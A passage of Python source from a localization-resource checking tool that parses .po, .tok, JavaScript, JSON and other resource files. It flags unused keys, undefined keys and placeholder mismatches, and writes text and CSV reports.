LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class PoResDetector(BaseResDetector):
#Since only this function is overridden and the logic is the same as in StrResDetector, this class could derive from StrResDetector to reuse code
def get_placeholder_pattern(self):
#reference: http://pubs.opengroup.org/onlinepubs/009695399/functions/printf.html
positive_integer = PY.Word("123456789", PY.nums)
index = positive_integer + PY.Literal("$")
flags = PY.Word("'-+ #0")
width = positive_integer | (PY.Literal("*") + PY.Optional(positive_integer + PY.Literal("$")))
precision = PY.Literal(".") + width
length_modifier = PY.Literal("hh") | PY.Literal("ll") | PY.Word("hljztqL", exact = 1)
conversion_specifier = PY.Word("@sdiouUxXfFeEgGaAcpnCS%", exact = 1)
placeholder_pattern = PY.originalTextFor(PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(length_modifier) + conversion_specifier))
return placeholder_pattern
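# TokResFile parses .tok files: the entire [[ ... ]] token (five numeric fields plus a quoted string) is used as the key, and values consisting only of digits, punctuation and whitespace are skipped.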
class TokResFile(BaseResFile):
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
digit_value = PY.Word(string.digits + string.punctuation + string.whitespace).leaveWhitespace().parseWithTabs()
key_value_pair = PY.originalTextFor(PY.Literal("[[") + (PY.Word(PY.nums) + PY.Literal("|")) * 5 + PY.dblQuotedString + PY.Literal("]]")) + PY.Literal("=").suppress() + PY.SkipTo(PY.lineEnd)
for tokens, start, end in key_value_pair.parseWithTabs().scanString(data):
key = tokens[0]
value = tokens[1]
if not value:
continue
try:
digit_value.parseString(value, parseAll = True)
except PY.ParseException:
pass
else:
continue
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class TokResDetector(BaseResDetector):
#Since only this function is overridden and the logic is the same as in StrResDetector, this class could derive from StrResDetector to reuse code
def get_placeholder_pattern(self):
#reference: http://pubs.opengroup.org/onlinepubs/009695399/functions/printf.html
positive_integer = PY.Word("123456789", PY.nums)
index = positive_integer + PY.Literal("$")
flags = PY.Word("'-+ #0")
width = positive_integer | (PY.Literal("*") + PY.Optional(positive_integer + PY.Literal("$")))
precision = PY.Literal(".") + width
length_modifier = PY.Literal("hh") | PY.Literal("ll") | PY.Word("hljztqL", exact = 1)
conversion_specifier = PY.Word("@sdiouUxXfFeEgGaAcpnCS%", exact = 1)
placeholder_pattern = PY.originalTextFor(PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(length_modifier) + conversion_specifier))
return placeholder_pattern
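# JsResFile handles JavaScript nls resource bundles (a Dojo-style layout is assumed here as an illustration): files live in per-language subfolders of an "nls" directory, with "root" holding the base language, and keys are UPPER_CASE identifiers mapped to string expressions.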
class JsResFile(BaseResFile):
def get_language(self):
base_name = os.path.basename(self.directory).lower()
if base_name == "root":
return BASE_LANGUAGE
elif base_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[base_name]
else:
LOG.critical("'{language}' is not pre-defined in {application}, please contact tool author".format(language = base_name, application = __application__))
quit_application(-1)
def get_group_id(self):
return self.file, os.path.dirname(self.directory)
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
key_pattern = (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t))
value_pattern = PY.SkipTo((PY.Literal(",") | PY.Literal("\r\n") | PY.Literal("}")), include = False, ignore = PY.quotedString|PY.cppStyleComment).setParseAction(lambda t: t[0].rstrip("\r\n").rstrip(",").strip(" \t"))
comment = PY.cppStyleComment
key_value_pattern = (key_pattern | (PY.Literal("\"").suppress() + key_pattern + PY.Literal("\"").suppress()) | (PY.Literal("'").suppress() + key_pattern + PY.Literal("'").suppress())) + PY.Literal(":").suppress() + value_pattern
escape_pattern = re.compile("'.*(?<!\\\)'.*'|\".*(?<!\\\)\".*\"")
for tokens, start, end in key_value_pattern.ignore(comment).scanString(data):
key = tokens[0]
value = tokens[1]
pure_value = value[1:-1]
if key in self.keys:
self.duplicate_keys.append(key)
if escape_pattern.match(value):
if not "+" in value:
self.escape_error_keys.append(key)
else:
for sub_string in value.split("+"):
if escape_pattern.match(sub_string.strip(" \t")):
self.escape_error_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class JsResDetector(BaseResDetector):
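# Placeholders in these bundles are hash-delimited tokens (for example "#USER-NAME#", an illustrative name); unused/undefined key detection cross-checks resource keys against js/htm/html sources outside the nls folders.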
def get_placeholder_pattern(self):
return PY.Combine(PY.Literal("#").suppress() + PY.Word(PY.alphanums, PY.alphanums + "-") + PY.Literal("#").suppress())
def get_res_keys_and_src_keys(self):
res_keys = set()
for res_file_group in self.res_file_groups:
if res_file_group.base_res_file:
res_keys = res_keys | res_file_group.base_res_file.keys
src_keys = set()
src_key_info = []
res_folder_pattern = os.sep + "nls" + os.sep
for root, dirs, files in os.walk(self.src_dir):
if not res_folder_pattern in (root + os.sep):
for file in files:
for extension in ["js", "htm", "html"]:
if file.endswith(extension):
src_file = BaseSrcFile(root, file, extension)
for key, start, end in src_file.get_resource_keys():
src_keys.add(key)
src_key_info.append((key, src_file, start, end))
return res_keys, src_keys, src_key_info
def detect_unused_and_undefined_keys(self):
detect_unused_key = IssueName.unused_key.value in self.detect_issues
detect_improper_used_key = IssueName.improperly_used_key.value in self.detect_issues
if detect_unused_key:
LOG.info("Detecting unused keys in resource files, which may take some time...")
res_keys, src_keys, src_key_info = self.get_res_keys_and_src_keys()
elif detect_improper_used_key:
LOG.info("Detecting undefined resource keys in source code, which may take some time...")
res_keys, src_keys, src_key_info = self.get_res_keys_and_src_keys()
else:
return
if detect_unused_key:
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
missing_keys = base_res_file.keys - src_keys
for missing_key in sorted(missing_keys):
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.unused_key, description = Description.unused_key, severity = Severity.warning, context = Context.unused_key.value.format(missing_key))
self.issues.add(issue)
if detect_improper_used_key:
if detect_unused_key:
LOG.info("Detecting undefined resource keys in source code...")
for key, src_file, start, end in src_key_info:
if not key in res_keys:
column_begin, column_begin_offset = src_file.get_column_number_with_offset(start)
issue = Issue(file = src_file.path, line = src_file.get_line_number(start), column_begin = column_begin, column_begin_offset = column_begin_offset, column_end = src_file.get_column_number(end), code = IssueCode.improperly_used_key, description = Description.improperly_used_key, severity = Severity.error, context = Context.improperly_used_key.value.format(src_file.get_line(start).strip("\r")))
self.issues.add(issue)
class JsonResFile(BaseResFile):
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
def flat_dict(prefix, json_dict):
for key, value in json_dict.items():
key = key if not prefix else prefix + "." + key
if type(value) == str:
yield key, value
elif type(value) == dict:
for sub_key, sub_value in flat_dict(key, value):
yield sub_key, sub_value
else:
LOG.warning("Non-dict/str type found when getting key-value pairs from json file '{path}'".format(path = self.path))
try:
for key, value in flat_dict("", json.loads(data)):
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class JsonResDetector(BaseResDetector):
def get_placeholder_pattern(self):
return PY.Literal("{").suppress() + PY.Word(PY.nums) + PY.Literal("}").suppress()
class BaseSrcFile:
def __init__(self, directory, file, extension):
self.directory = directory
self.file = file
self.extension = extension
self.path = os.path.join(directory, file)
self.code = self.read()
def read(self):
try:
f = open(self.path, "rb")
bin_data = f.read()
f.close()
except Exception as e:
LOG.error("Cannot open file '{path}' to read: {exception}".format(path = self.path, exception = e))
return None
# Check the UTF-32 BOMs before the UTF-16 BOMs: codecs.BOM_UTF32_LE begins with the same bytes as codecs.BOM_UTF16_LE, so the longer BOM must be tested first.
for bom, encoding in {codecs.BOM_UTF8 : "utf_8", codecs.BOM_UTF32_BE : "utf_32_be", codecs.BOM_UTF32_LE : "utf_32_le", codecs.BOM_UTF16_BE : "utf_16_be", codecs.BOM_UTF16_LE : "utf_16_le"}.items():
if bin_data.startswith(bom):
try:
return bin_data[len(bom):].decode(encoding)
except UnicodeDecodeError:
LOG.error("Cannot read file '{path}', the real encoding is not the same as {encoding} encoding detected by BOM".format(path = self.path, encoding = encoding))
return None
try:
return bin_data.decode("utf_8")
except UnicodeDecodeError:
pass
try:
return bin_data.decode("cp1252")
except UnicodeDecodeError:
pass
try:
return bin_data.decode(locale.getpreferredencoding())
except UnicodeDecodeError:
LOG.error("Cannot read file '{path}', encoding is unknown".format(path = self.path))
return None
def get_line_number(self, location):
return self.code.count("\n", 0, location) + 1
def get_column_number(self, location):
try:
if self.code[location] == "\n":
return 1
else:
return location - self.code.rfind("\n", 0, location)
except IndexError:
return 0
def get_column_number_with_offset(self, location):
try:
if self.code[location] == "\n":
return 1, 0
else:
column_start = self.code.rfind("\n", 0, location)
return location - column_start, self.code.count("\t", column_start + 1, location) * (TAB_WIDTH - 1)
except IndexError:
return 0, 0
def get_code_snippet(self, start, end):
return self.code[start:end]
def get_line(self, location):
last_new_line = self.code.rfind("\n", 0, location)
next_new_line = self.code.find("\n", location)
if next_new_line >= 0:
return self.code[(last_new_line + 1):next_new_line]
else:
return self.code[(last_new_line + 1):]
def get_resource_keys(self):
if not self.code:
return None
target = None
if self.extension == "js":
#resource_key = (((PY.Literal("Locale") + PY.Optional(PY.Word(PY.alphas))) | PY.Literal("html")) + PY.Literal(".")).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + PY.NotAny(PY.Word(PY.alphanums + "_")).suppress()
resource_key = ((PY.CaselessLiteral("locale") + PY.Optional(PY.Word(PY.alphanums + "_")) + PY.Literal(".") + PY.Optional(PY.Word(PY.alphas) + PY.Literal("."))) | (PY.Literal("html") + PY.Literal("."))).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + PY.NotAny(PY.Word(PY.alphanums + "_")).suppress()
#resource_key = ((PY.Literal("getLocalizationData()") + PY.Literal(".") + PY.Word(PY.alphas)) | (PY.Word(PY.alphas) + PY.Literal(".") + PY.Optional(PY.Word(PY.alphas) + PY.Literal(".")))).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + PY.NotAny(PY.Word(PY.alphanums + "_")).suppress()
comment = PY.cppStyleComment
string_parser = PY.quotedString
target = resource_key.ignore(comment | string_parser).parseWithTabs()
elif self.extension == "htm" or self.extension == "html":
resource_key = (PY.Literal("{") *(2, 3)).suppress() + (PY.Literal("Locale.") | PY.Literal("html.") | PY.Literal("locale.html.")).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + (PY.Literal("}") *(2, 3)).suppress()
#resource_key = (PY.Word(PY.alphanums + "_") + PY.Literal(".")).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t))
comment = PY.htmlComment
target = resource_key.ignore(comment).parseWithTabs()
else:
pass
#target = PY.NoMatch
for tokens, start, end in target.scanString(self.code):
yield tokens[0], start, end
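# Configuration loads an optional resource_detector_config.py from the scan directory and maps every supported resource type to its detector class, resource-file class and configuration attribute names.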
class Configuration:
def __init__(self, dir_input):
self.config_module_dir = dir_input
self.config_file_name = "resource_detector_config.py"
self.config_module_name = "resource_detector_config"
self.config_file_path = os.path.join(self.config_module_dir, self.config_file_name)
self.config_module = self.get_config_module()
self.use_user_config = True if self.config_module else False
self.support_res_exts = ["resx", "resw", "rc", "rc2", "mc", "wxl", "strings", "xml", "js", "properties", "po", "tok", "xib", "json"]
self.support_res_types = ["resx", "resw", "rc", "rc2", "mc", "wxl", "strings", "xml", "js", "properties", "po", "tok", "xib", "json"]
self.detector_switch_attrs = \
{
"resx" : "USE_RESX_DETECTOR",
"resw" : "USE_RESW_DETECTOR",
"rc" : "USE_RC_DETECTOR",
"rc2" : "USE_RC2_DETECTOR",
"mc" : "USE_MC_DETECTOR",
"wxl" : "USE_WXL_DETECTOR",
"strings" : "USE_STR_DETECTOR",
"xml" : "USE_XML_DETECTOR",
"js" : "USE_JS_DETECTOR",
"properties" : "USE_PRO_DETECTOR",
"po" : "USE_PO_DETECTOR",
"tok" : "USE_TOK_DETECTOR",
"xib" : "USE_XIB_DETECTOR",
"json" : "USE_JSON_DETECTOR",
}
self.detect_issues_attrs = \
{
"resx" : "RESX_DETECT_ISSUES",
"resw" : "RESW_DETECT_ISSUES",
"rc" : "RC_DETECT_ISSUES",
"rc2" : "RC2_DETECT_ISSUES",
"mc" : "MC_DETECT_ISSUES",
"wxl" : "WXL_DETECT_ISSUES",
"strings" : "STR_DETECT_ISSUES",
"xml" : "XML_DETECT_ISSUES",
"js" : "JS_DETECT_ISSUES",
"properties" : "PRO_DETECT_ISSUES",
"po" : "PO_DETECT_ISSUES",
"tok" : "TOK_DETECT_ISSUES",
"xib" : "XIB_DETECT_ISSUES",
"json" : "JSON_DETECT_ISSUES",
}
self.fixed_res_groups_attrs = \
{
"resx" : "USE_FIXED_RESX_RES_FILE_GROUPS",
"resw" : "USE_FIXED_RESW_RES_FILE_GROUPS",
"rc" : "USE_FIXED_RC_RES_FILE_GROUPS",
"rc2" : "USE_FIXED_RC2_RES_FILE_GROUPS",
"mc" : "USE_FIXED_MC_RES_FILE_GROUPS",
"wxl" : "USE_FIXED_WXL_RES_FILE_GROUPS",
"strings" : "USE_FIXED_STR_RES_FILE_GROUPS",
"xml" : "USE_FIXED_XML_RES_FILE_GROUPS",
"js" : "USE_FIXED_JS_RES_FILE_GROUPS",
"properties" : "USE_FIXED_PRO_RES_FILE_GROUPS",
"po" : "USE_FIXED_PO_RES_FILE_GROUPS",
"tok" : "USE_FIXED_TOK_RES_FILE_GROUPS",
"xib" : "USE_FIXED_XIB_RES_FILE_GROUPS",
"json" : "USE_FIXED_JSON_RES_FILE_GROUPS",
}
self.res_groups_attrs = \
{
"resx" : "RESX_RES_FILE_GROUPS",
"resw" : "RESW_RES_FILE_GROUPS",
"rc" : "RC_RES_FILE_GROUPS",
"rc2" : "RC2_RES_FILE_GROUPS",
"mc" : "MC_RES_FILE_GROUPS",
"wxl" : "WXL_RES_FILE_GROUPS",
"strings" : "STR_RES_FILE_GROUPS",
"xml" : "XML_RES_FILE_GROUPS",
"js" : "JS_RES_FILE_GROUPS",
"properties" : "PRO_RES_FILE_GROUPS",
"po" : "PO_RES_FILE_GROUPS",
"tok" : "TOK_RES_FILE_GROUPS",
"xib" : "XIB_RES_FILE_GROUPS",
"json" : "JSON_RES_FILE_GROUPS",
}
self.detect_languages_attrs = \
{
"resx" : "RESX_DETECT_LANGUAGES",
"resw" : "RESW_DETECT_LANGUAGES",
"rc" : "RC_DETECT_LANGUAGES",
"rc2" : "RC2_DETECT_LANGUAGES",
"mc" : "MC_DETECT_LANGUAGES",
"wxl" : "WXL_DETECT_LANGUAGES",
"strings" : "STR_DETECT_LANGUAGES",
"xml" : "XML_DETECT_LANGUAGES",
"js" : "JS_DETECT_LANGUAGES",
"properties" : "PRO_DETECT_LANGUAGES",
"po" : "PO_DETECT_LANGUAGES",
"tok" : "TOK_DETECT_LANGUAGES",
"xib" : "XIB_DETECT_LANGUAGES",
"json" : "JSON_DETECT_LANGUAGES",
}
self.detector_classes = \
{
"resx" : ResxResDetector,
"resw" : ReswResDetector,
"rc" : RcResDetector,
"rc2" : Rc2ResDetector,
"mc" : McResDetector,
"wxl" : WxlResDetector,
"strings" : StrResDetector,
"xml" : XmlResDetector,
"js" : JsResDetector,
"properties" : ProResDetector,
"po" : PoResDetector,
"tok" : TokResDetector,
"xib" : XibResDetector,
"json" : JsonResDetector,
}
self.res_file_classes = \
{
"resx" : ResxResFile,
"resw" : ReswResFile,
"rc" : RcResFile,
"rc2" : Rc2ResFile,
"mc" : McResFile,
"wxl" : WxlResFile,
"strings" : StrResFile,
"xml" : XmlResFile,
"js" : JsResFile,
"properties" : ProResFile,
"po" : PoResFile,
"tok" : TokResFile,
"xib" : XibResFile,
"json" : JsonResFile,
}
self.default_detect_issues = {issue_name.value for issue_name in IssueName if issue_name != IssueName.untranslated_value}
self.ignore_issues_attr = "IGNORE_ISSUES"
def get_config_module(self):
if not os.path.isfile(self.config_file_path):
return None
if not self.config_module_dir in sys.path:
sys.path.insert(0, self.config_module_dir)
if not self.config_module_name in sys.modules:
try:
config = importlib.__import__(self.config_module_name)
del sys.path[0]
return config
except ImportError as ie:
del sys.path[0]
LOG.critical("Cannot import configuration file: {import_error}".format(import_error = ie))
quit_application(-1)
except Exception as e:
del sys.path[0]
LOG.critical("Cannot import configuration file: {exception}".format(exception = e))
quit_application(-1)
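# ResourceDetector is the top-level driver: it collects resource files per type, runs the matching detector, aggregates the issues, and can generate a configuration file instead of scanning.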
class ResourceDetector:
def __init__(self, arguments):
self.args = arguments
self.src_dir = self.get_absolute_path(arguments.directory)
self.res_files = {}
self.res_file_count = 0
self.issues = Issues()
self.begin_time = datetime.utcnow()
self.end_time = datetime.utcnow()
self.file_count = 0
self.item_count = 0
self.config = Configuration(self.src_dir)
def get_absolute_path(self, dir_input):
scan_dir = os.path.abspath(dir_input)
if not os.path.isdir(scan_dir):
LOG.critical("The input scan directory '{directory}' is not valid, please have a check".format(directory = scan_dir))
quit_application(-1)
return scan_dir
def run(self):
if self.args.generate_config:
self.write_configuration()
else:
self.detect()
self.filter_issues()
self.end_time = datetime.utcnow()
self.display_summary_result()
self.write_result_for_user()
self.write_result_for_ignoring()
self.write_result_for_platform()
def get_resource_files(self):
LOG.info("Filtering resource files in '{directory}'...".format(directory = self.src_dir))
for res_type in self.config.support_res_types:
self.res_files[res_type] = []
res_file_count = 0
for root, dirs, files in os.walk(self.src_dir):
for file in files:
self.file_count += 1
for ext in self.config.support_res_exts:
if file.endswith("." + ext):
if ext == "xml":
if "values" in os.path.basename(root):
self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext))
else:
continue
elif ext == "js":
if os.path.dirname(root).endswith("nls"):
self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext))
else:
continue
elif ext == "json":
if ("locales" == os.path.basename(root)) or ("_locales" in root.lower().split(os.sep)):
self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext))
else:
continue
else:
self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext))
res_file_count += 1
LOG.info("Filtered {0} resource files from {1} files".format(res_file_count, self.file_count))
def detect(self):
LOG.info("Start running {application} to scan '{src_dir}'".format(application = __application__, src_dir = self.src_dir))
if self.config.use_user_config:
self.get_resource_files()
LOG.info("Configuration file '{config_file}' exists, start detecting with this configuration file".format(config_file = self.config.config_file_path))
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
for res_type in self.config.support_res_types:
res_files = self.res_files.get(res_type)
if not res_files:
continue
try:
detector_switch = getattr(self.config.config_module, self.config.detector_switch_attrs[res_type])
if detector_switch == True:
try:
LOG.info("Start running {res_type} {application} with configuration".format(res_type = res_type, application = __application__))
res_detector = self.config.detector_classes[res_type](self.src_dir, res_files, self.config, res_type)
res_detector.detect()
self.issues.extend(res_detector.issues)
self.item_count += res_detector.item_count
self.res_file_count += res_detector.res_file_count
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when running {res_type} {application}: {exception}".format(res_type = res_type, application = __application__, exception = e))
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
quit_application(-1)
except AttributeError:
pass
else:
self.get_resource_files()
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
for res_type in self.config.support_res_types:
res_files = self.res_files.get(res_type)
if res_files:
try:
LOG.info("Start running {res_type} {application}".format(res_type = res_type, application = __application__))
res_detector = self.config.detector_classes[res_type](self.src_dir, res_files, self.config, res_type)
res_detector.detect()
self.issues.extend(res_detector.issues)
self.item_count += res_detector.item_count
self.res_file_count += res_detector.res_file_count
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when running {res_type} {application}: {exception}".format(res_type = res_type, application = __application__, exception = e))
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
quit_application(-1)
def write_configuration(self):
LOG.info("Start generating a new configuration file: '{config_file}'".format(config_file = self.config.config_file_path))
try:
output_file = open(file = self.config.config_file_path, mode = "w", encoding = "utf_8_sig")
except Exception as e:
LOG.critical("Cannot open '{config_file}' to write configuration content: {exception}".format(config_file = self.config.config_file_path, exception = e))
quit_application(-1)
self.get_resource_files()
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
try:
output_file.write("# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n")
output_file.write("# configuration file generated time(utc): {time_now}\n\n\n".format(time_now = datetime.utcnow()))
output_file.close()
except Exception as e:
LOG.critical("An error occurred when writing configuration to '{config_file}': {exception}".format(config_file = self.config.config_file_path, exception = e))
quit_application(-1)
for res_type in self.config.support_res_types:
res_files = self.res_files.get(res_type)
if res_files:
try:
LOG.info("Start writing configuration related to {res_type} files".format(res_type = res_type))
res_detector = self.config.detector_classes[res_type](self.src_dir, res_files, self.config, res_type)
res_detector.write_configuration()
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when writing configuration related to {ext} files: {exception}".format(ext = res_type, exception = e))
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
quit_application(-1)
try:
output_file = open(file = self.config.config_file_path, mode = "a", encoding = "utf_8_sig")
output_file.write("#Copy the issues you want to ignore from detection result to the set, each issue item should be like the example below: R'''issue''',\n")
output_file.write("#You can also use -i option to generate the ignore issue patterns which can be directly copied and used here\n")
output_file.write("{ignore_issues_attr} =\\\n".format(ignore_issues_attr = self.config.ignore_issues_attr) + "{\n")
output_file.write("#R'''{issue_string}''',\n".format(issue_string = R"D:\Code\TestCode\StudioArthur\Installers\Console\LocalizedResources\zh-cn.wxl, 0, 0, unmatched placeholder(s) in localized resource file, error, key=WelcomeEulaDlg_Title, value=[ProductName] 安装程序"))
output_file.write("}")
output_file.close()
except Exception as e:
LOG.critical("Cannot open '{config_file}' to write configuration content: {exception}".format(config_file = self.config.config_file_path, exception = e))
quit_application(-1)
LOG.info("Configuration file '{config_file}' has been generated, customize it and run {application} again".format(config_file = self.config.config_file_path, application = __application__))
def filter_issues(self):
if not self.config.use_user_config:
return
ignore_issues = getattr(self.config.config_module, self.config.ignore_issues_attr, set())
if not ignore_issues:
return
LOG.info("Filtering detected issues...")
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
remaining_issues = Issues()
for issue in self.issues.get_issues():
issue_for_user = "{file}, {line_begin}, {column_begin}, {description}, {severity}, {context}".format(file = issue.file, line_begin = issue.line, column_begin = issue.column_begin + issue.column_begin_offset, description = issue.description.value, severity = issue.severity.value, context = issue.context.replace("\u2308", "").replace("\u2309", "").strip())
if not issue_for_user in ignore_issues:
remaining_issues.add(issue)
else:
ignore_issues.remove(issue_for_user)
self.issues = remaining_issues
def display_summary_result(self):
LOG.info("Detection result summary:")
LOG.info("Start time: {start_time}".format(start_time = self.begin_time.replace(tzinfo = timezone.utc).astimezone()))
LOG.info("End time: {end_time}".format(end_time = self.end_time.replace(tzinfo = timezone.utc).astimezone()))
LOG.info("Time cost(hh:mm:ss): {duration}".format(duration = self.end_time - self.begin_time))
LOG.info("File(s) scanned: {file_count}".format(file_count = self.res_file_count))
LOG.info("Item(s) scanned: {item_count}".format(item_count = self.item_count))
LOG.info("Issue(s) detected: {issue_count}".format(issue_count = self.issues.issue_count))
LOG.info("Error(s) detected: {error_count}".format(error_count = self.issues.error_count))
LOG.info("Warning(s) detected: {warning_count}".format(warning_count = self.issues.warning_count))
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
def write_result_for_platform(self):
try:
if self.args.summary:
LOG.info("Writing summary detection result for platform...")
summary_file = self.args.summary
if not summary_file.endswith(".csv"):
summary_file = summary_file + ".csv"
with open(summary_file, "w", encoding = "utf_8_sig", newline = "") as fw:
summary_writer = csv.writer(fw)
summary_writer.writerow(["files", "errors", "warnings", "items", "begin", "end", "name", "version"])
summary_writer.writerow([self.res_file_count, self.issues.error_count, self.issues.warning_count, self.item_count, self.begin_time, self.end_time, __application__, __version__])
#LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
if self.args.details:
LOG.info("Writing detailed detection result for platform...")
details_file = self.args.details
if not details_file.endswith(".csv"):
details_file = details_file + ".csv"
with open(details_file, "w", encoding = "utf_8_sig", newline = "") as fw:
details_writer = csv.writer(fw)
details_writer.writerow(["file", "line", "column", "columnEnd", "severity", "code", "context"])
for issue in self.issues.get_issues():
details_writer.writerow([os.path.relpath(issue.file, self.src_dir).replace("\\", "/"), issue.line, issue.column_begin, issue.column_end, issue.severity.value, issue.code.value, issue.context])
#LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when writing detection result for platform: {exception}".format(exception = e))
quit_application(-1)
def write_result_for_user(self):
if self.args.output:
try:
LOG.info("Writing detection result...")
output_file = open(file = self.args.output, mode = "w", encoding = "utf_8_sig")
output_file.write("Detection result summary:\n")
output_file.write("Tool name: {tool_name}\n".format(tool_name = __application__))
output_file.write("Tool version: {tool_version}\n".format(tool_version = __version__))
output_file.write("Source directory: {src_dir}\n".format(src_dir = self.src_dir))
output_file.write("Start time: {start_time}\n".format(start_time = self.begin_time.replace(tzinfo = timezone.utc).astimezone()))
output_file.write("End time: {end_time}\n".format(end_time = self.end_time.replace(tzinfo=timezone.utc).astimezone()))
output_file.write("Time cost(hh:mm:ss): {duration}\n".format(duration = self.end_time - self.begin_time))
output_file.write("File(s) scanned: {file_count}\n".format(file_count = self.res_file_count))
output_file.write("Item(s) scanned: {item_count}\n".format(item_count = self.item_count))
output_file.write("Issue(s) detected: {issue_count}\n".format(issue_count = self.issues.issue_count))
output_file.write("Error(s) detected: {error_count}\n".format(error_count = self.issues.error_count))
output_file.write("Warning(s) detected: {warning_count}\n".format(warning_count = self.issues.warning_count))
output_file.write("---------------------------------------------------------------------------------------------------------------------------------------------------------\n")
output_file.write("File, Line, Column, Issue, Severity, Context\n")
for issue in self.issues.get_issues():
output_file.write("{file}, {line_begin}, {column_begin}, {description}, {severity}, {context}\n".format(file = issue.file, line_begin = issue.line, column_begin = issue.column_begin + issue.column_begin_offset, description = issue.description.value, severity = issue.severity.value, context = issue.context.replace("\u2308", "").replace("\u2309", "").strip()))
output_file.close()
#LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when writing detection result to '{output_file}': {exception}".format(output_file = self.args.output, exception = e))
quit_application(-1)
def write_result_for_ignoring(self):
if self.args.ignore_pattern:
try:
LOG.info("Writing ignore issue patterns...")
output_file = open(file = self.args.ignore_pattern, mode = "w", encoding = "utf_8_sig")
for issue in self.issues.get_issues():
issue_pattern = "{file}, {line_begin}, {column_begin}, {description}, {severity}, {context}".format(file = issue.file, line_begin = issue.line, column_begin = issue.column_begin + issue.column_begin_offset, description = issue.description.value, severity = issue.severity.value, context = issue.context.replace("\u2308", "").replace("\u2309", "").strip())
output_file.write(repr(issue_pattern) + ",\n")
output_file.close()
#LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when writing ignore issue patterns to '{output_file}': {exception}".format(output_file = self.args.ignore_pattern, exception = e))
quit_application(-1)
def initialize(arguments):
try:
global LOG
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
formatter = logging.Formatter("[%(levelname)s]: %(message)s")
if arguments.log:
file_handler = logging.FileHandler(filename = arguments.log, mode = 'w', encoding = "utf_8_sig", delay = False)
file_handler.setFormatter(formatter)
LOG.addHandler(file_handler)
stream_handler = logging.StreamHandler(stream = sys.stdout)
stream_handler.setFormatter(formatter)
LOG.addHandler(stream_handler)
except Exception as e:
print("[CRITICAL]: An error occurred when initializing logging: {exception}".format(exception = e))
print("[INFO]: {application} exited abnormally".format(application = __application__))
sys.exit(-1)
if arguments.tab:
if arguments.tab.isdigit():
try:
global TAB_WIDTH
